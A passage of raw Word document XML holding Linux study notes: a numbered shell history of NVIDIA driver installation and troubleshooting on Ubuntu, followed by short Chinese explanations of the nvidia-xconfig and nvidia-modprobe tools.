      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   56  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822CB35" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   57  lsmod | grep nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA6A8C" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   58  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3662D7" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   59  nvidia-xconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A8DBF" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   60  cat /etc/X11/xorg.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CC8B4" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   61  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC85F3" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   62  nvidia-s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B659C" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   63  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6038F" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   64  history | grep mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB388C0" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   65  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91F4B5" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   66  lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30659E1E" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   67  lsmod | grep nvdia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456FC0FC" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   68  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B6673" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   69  lsmod | grep nvdia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A640FD" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   70  modprobe --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73180372" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   71  history | grep mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B492EF0" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   72  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419A9736" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   73  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03326453" w14:textId="45E7FA34" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   74  nvidia-xconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F65A5" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   78  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B4C32" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   79  apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E172887" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   80  sudo sed -i 's@//.*archive.ubuntu.com@//mirrors.ustc.edu.cn@g' /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397AA161" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   81  apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DD404" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   82  apt install linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B65C2" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   83  apt dist-upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BA82E" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   84  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7FCB59" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   85  nvidia-modprobe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8D8B2" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   86  lsmod | grep nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8DE374" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   87  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BBB3A" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   88  apt autoremove &amp;&amp; apt autoclean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A4AA2" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   89  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DE2EC" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   90  cd /home/syj/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7748CE" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   91  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30F535" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   92  cd /mnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573BBB28" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   93  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2987E39F" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   94  cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34086D" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   95  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30342A3F" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   96  cd  media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4574E6" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   97  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA2765D" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   98  ./NVIDIA-Linux-x86_64-525.89.02.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A3D3AF" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   99  rmmod nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCAAD5" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  100  apt seach nouveau | grep installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19326115" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  101  apt search nouveau | grep installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC322D8" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  102  apt search nvidia | grep installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C857F" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  103  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A287C" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  104  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30049A" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  105  ./NVIDIA-Linux-x86_64-525.89.02.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D3C78" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  106  lsmod | grep nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5775AE18" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  107  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4BB24" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  108  cd /lib/modprobe.d/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC278C" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  109  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61760D09" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  110  cd /etc/modprobe.d/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DEF0AF" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  111  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC417F4" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  112  cat nvidia-installer-disable-nouveau.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7D630" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  113  reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40D4AA" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  114  history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B66CE" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  115  nvcc -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D13DFFF" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  116  nvcc -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8540CE" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  117  at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591412C0" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  118  apt install at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72202996" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  119  at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E85787" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  120  at -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A72AF95" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  121  ps -efj | grep cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC6C34B" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  122  ps -efj | grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EC863" w14:textId="0C5BD15B" w:rsidR="00E43D96" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  123  ps -efj | grep auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B38F8" w14:textId="474562AD" w:rsidR="00BA3A23" w:rsidRDefault="00BA3A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE765DB" w14:textId="26A6E4F9" w:rsidR="00BA3A23" w:rsidRDefault="00BA3A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1280CF" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB116B0" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7464A53A" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D922D6" w14:textId="441F09E1" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc159779671"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nvidia-xconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：显卡对屏幕的输出</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="0A1A18B8" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nvidia-xconfig </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个用于为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡生成和管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xorg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xorg.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的命令行工具。它可以自动检测并配置系统中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡，以便在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> X Window </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中正确地使用它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263306B7" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4905BEC4" w14:textId="0E9552FB" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nvidia-xconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，您可以轻松地设置和调整与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡相关的配置选项，例如屏幕分辨率、刷新率和多显示器设置等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A4915" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50546A22" w14:textId="77777777" w:rsidR="00980FD2" w:rsidRDefault="00980FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7785CD95" w14:textId="77777777" w:rsidR="00CB6C6F" w:rsidRDefault="00CB6C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A49768E" w14:textId="4866193D" w:rsidR="00CB6C6F" w:rsidRDefault="00CB6C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc159779672"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nvidia-modprobe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：手动加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nvidia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡内核模块（即驱动）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w14:paraId="5268A6A3" w14:textId="77777777" w:rsidR="00CB6C6F" w:rsidRDefault="00CB6C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nvidia-modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个用于加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡内核模块（驱动程序）的命令行工具。它的主要目的是确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核模块正确加载到内核中，从而使系统可以正确地识别和使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CDA325" w14:textId="77777777" w:rsidR="00CB6C6F" w:rsidRDefault="00CB6C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21266AEB" w14:textId="52F87372" w:rsidR="00CB6C6F" w:rsidRDefault="00CB6C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些情况下，您可能需要手动加载或卸载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块，例如在安装或更新驱动程序时。这时，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nvidia-modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来完成这些操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4AF97" w14:textId="77777777" w:rsidR="00CB6C6F" w:rsidRDefault="00CB6C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
